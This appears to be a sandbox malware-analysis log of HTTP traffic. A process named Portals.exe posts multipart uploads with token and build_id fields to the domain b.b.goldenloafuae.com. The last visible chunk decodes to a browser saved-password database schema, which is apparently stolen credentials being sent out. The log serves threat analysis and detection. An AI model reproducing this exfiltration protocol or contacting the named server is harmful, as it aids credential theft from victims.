                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    8192.168.2.44975994.130.189.584438012C:\Users\user\Desktop\Portals.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2025-03-13 17:02:53 UTC295OUTPOST / HTTP/1.1
                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----yukn7900rqq1v3wlfk6f
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/131.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                    Host: b.b.goldenloafuae.com
                                                                                                                                                                                                    Content-Length: 5877
                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                    2025-03-13 17:02:53 UTC5877OUTData Raw: 2d 2d 2d 2d 2d 2d 79 75 6b 6e 37 39 30 30 72 71 71 31 76 33 77 6c 66 6b 36 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 39 32 61 66 39 63 65 35 34 31 64 37 65 63 31 65 65 63 66 30 34 38 34 31 63 31 35 36 61 32 65 0d 0a 2d 2d 2d 2d 2d 2d 79 75 6b 6e 37 39 30 30 72 71 71 31 76 33 77 6c 66 6b 36 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 61 33 32 34 37 31 64 65 38 33 32 33 63 36 36 64 65 34 33 65 62 38 33 31 33 65 38 30 36 66 65 61 0d 0a 2d 2d 2d 2d 2d 2d 79 75 6b 6e 37 39 30 30 72 71 71 31 76 33 77 6c 66 6b 36 66 0d 0a 43 6f 6e 74
                                                                                                                                                                                                    Data Ascii: ------yukn7900rqq1v3wlfk6fContent-Disposition: form-data; name="token"e92af9ce541d7ec1eecf04841c156a2e------yukn7900rqq1v3wlfk6fContent-Disposition: form-data; name="build_id"a32471de8323c66de43eb8313e806fea------yukn7900rqq1v3wlfk6fCont
                                                                                                                                                                                                    2025-03-13 17:02:54 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                    Date: Thu, 13 Mar 2025 17:02:54 GMT
                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                    2025-03-13 17:02:54 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 2ok0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    9192.168.2.44976094.130.189.584438012C:\Users\user\Desktop\Portals.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2025-03-13 17:02:55 UTC294OUTPOST / HTTP/1.1
                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----gd2n7gdt2ng4eusj5fk6
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/131.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                    Host: b.b.goldenloafuae.com
                                                                                                                                                                                                    Content-Length: 489
                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                    2025-03-13 17:02:55 UTC489OUTData Raw: 2d 2d 2d 2d 2d 2d 67 64 32 6e 37 67 64 74 32 6e 67 34 65 75 73 6a 35 66 6b 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 39 32 61 66 39 63 65 35 34 31 64 37 65 63 31 65 65 63 66 30 34 38 34 31 63 31 35 36 61 32 65 0d 0a 2d 2d 2d 2d 2d 2d 67 64 32 6e 37 67 64 74 32 6e 67 34 65 75 73 6a 35 66 6b 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 61 33 32 34 37 31 64 65 38 33 32 33 63 36 36 64 65 34 33 65 62 38 33 31 33 65 38 30 36 66 65 61 0d 0a 2d 2d 2d 2d 2d 2d 67 64 32 6e 37 67 64 74 32 6e 67 34 65 75 73 6a 35 66 6b 36 0d 0a 43 6f 6e 74
                                                                                                                                                                                                    Data Ascii: ------gd2n7gdt2ng4eusj5fk6Content-Disposition: form-data; name="token"e92af9ce541d7ec1eecf04841c156a2e------gd2n7gdt2ng4eusj5fk6Content-Disposition: form-data; name="build_id"a32471de8323c66de43eb8313e806fea------gd2n7gdt2ng4eusj5fk6Cont
                                                                                                                                                                                                    2025-03-13 17:02:56 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                    Date: Thu, 13 Mar 2025 17:02:55 GMT
                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                    2025-03-13 17:02:56 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 2ok0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    10192.168.2.44976194.130.189.584438012C:\Users\user\Desktop\Portals.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2025-03-13 17:02:56 UTC297OUTPOST / HTTP/1.1
                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----xt00zm7q16pzmy5xlng4
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/131.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                    Host: b.b.goldenloafuae.com
                                                                                                                                                                                                    Content-Length: 262605
                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                    2025-03-13 17:02:56 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 78 74 30 30 7a 6d 37 71 31 36 70 7a 6d 79 35 78 6c 6e 67 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 39 32 61 66 39 63 65 35 34 31 64 37 65 63 31 65 65 63 66 30 34 38 34 31 63 31 35 36 61 32 65 0d 0a 2d 2d 2d 2d 2d 2d 78 74 30 30 7a 6d 37 71 31 36 70 7a 6d 79 35 78 6c 6e 67 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 61 33 32 34 37 31 64 65 38 33 32 33 63 36 36 64 65 34 33 65 62 38 33 31 33 65 38 30 36 66 65 61 0d 0a 2d 2d 2d 2d 2d 2d 78 74 30 30 7a 6d 37 71 31 36 70 7a 6d 79 35 78 6c 6e 67 34 0d 0a 43 6f 6e 74
                                                                                                                                                                                                    Data Ascii: ------xt00zm7q16pzmy5xlng4Content-Disposition: form-data; name="token"e92af9ce541d7ec1eecf04841c156a2e------xt00zm7q16pzmy5xlng4Content-Disposition: form-data; name="build_id"a32471de8323c66de43eb8313e806fea------xt00zm7q16pzmy5xlng4Cont
                                                                                                                                                                                                    2025-03-13 17:02:56 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                    2025-03-13 17:02:56 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                    2025-03-13 17:02:56 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                    2025-03-13 17:02:56 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                    2025-03-13 17:02:56 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                    2025-03-13 17:02:56 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                    2025-03-13 17:02:56 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                    2025-03-13 17:02:56 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                    2025-03-13 17:02:56 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                    2025-03-13 17:02:57 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                    Date: Thu, 13 Mar 2025 17:02:57 GMT
                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                    Connection: close


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    11192.168.2.44976294.130.189.584438012C:\Users\user\Desktop\Portals.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2025-03-13 17:02:58 UTC296OUTPOST / HTTP/1.1
                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----2dtjmy58gdtje3oh47g4
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/131.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                    Host: b.b.goldenloafuae.com
                                                                                                                                                                                                    Content-Length: 55081
                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                    2025-03-13 17:02:58 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 32 64 74 6a 6d 79 35 38 67 64 74 6a 65 33 6f 68 34 37 67 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 39 32 61 66 39 63 65 35 34 31 64 37 65 63 31 65 65 63 66 30 34 38 34 31 63 31 35 36 61 32 65 0d 0a 2d 2d 2d 2d 2d 2d 32 64 74 6a 6d 79 35 38 67 64 74 6a 65 33 6f 68 34 37 67 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 61 33 32 34 37 31 64 65 38 33 32 33 63 36 36 64 65 34 33 65 62 38 33 31 33 65 38 30 36 66 65 61 0d 0a 2d 2d 2d 2d 2d 2d 32 64 74 6a 6d 79 35 38 67 64 74 6a 65 33 6f 68 34 37 67 34 0d 0a 43 6f 6e 74
                                                                                                                                                                                                    Data Ascii: ------2dtjmy58gdtje3oh47g4Content-Disposition: form-data; name="token"e92af9ce541d7ec1eecf04841c156a2e------2dtjmy58gdtje3oh47g4Content-Disposition: form-data; name="build_id"a32471de8323c66de43eb8313e806fea------2dtjmy58gdtje3oh47g4Cont
                                                                                                                                                                                                    2025-03-13 17:02:58 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                    2025-03-13 17:02:58 UTC16355OUTData Raw: 43 42 4a 54 6c 52 46 52 30 56 53 4c 43 42 7a 61 47 46 79 61 57 35 6e 58 32 35 76 64 47 6c 6d 61 57 4e 68 64 47 6c 76 62 6c 39 6b 61 58 4e 77 62 47 46 35 5a 57 51 67 53 55 35 55 52 55 64 46 55 69 42 4f 54 31 51 67 54 6c 56 4d 54 43 42 45 52 55 5a 42 56 55 78 55 49 44 41 73 49 47 74 6c 65 57 4e 6f 59 57 6c 75 58 32 6c 6b 5a 57 35 30 61 57 5a 70 5a 58 49 67 51 6b 78 50 51 69 77 67 63 32 56 75 5a 47 56 79 58 33 42 79 62 32 5a 70 62 47 56 66 61 57 31 68 5a 32 56 66 64 58 4a 73 49 46 5a 42 55 6b 4e 49 51 56 49 73 49 46 56 4f 53 56 46 56 52 53 41 6f 62 33 4a 70 5a 32 6c 75 58 33 56 79 62 43 77 67 64 58 4e 6c 63 6d 35 68 62 57 56 66 5a 57 78 6c 62 57 56 75 64 43 77 67 64 58 4e 6c 63 6d 35 68 62 57 56 66 64 6d 46 73 64 57 55 73 49 48 42 68 63 33 4e 33 62 33 4a 6b
                                                                                                                                                                                                    Data Ascii: CBJTlRFR0VSLCBzaGFyaW5nX25vdGlmaWNhdGlvbl9kaXNwbGF5ZWQgSU5URUdFUiBOT1QgTlVMTCBERUZBVUxUIDAsIGtleWNoYWluX2lkZW50aWZpZXIgQkxPQiwgc2VuZGVyX3Byb2ZpbGVfaW1hZ2VfdXJsIFZBUkNIQVIsIFVOSVFVRSAob3JpZ2luX3VybCwgdXNlcm5hbWVfZWxlbWVudCwgdXNlcm5hbWVfdmFsdWUsIHBhc3N3b3Jk
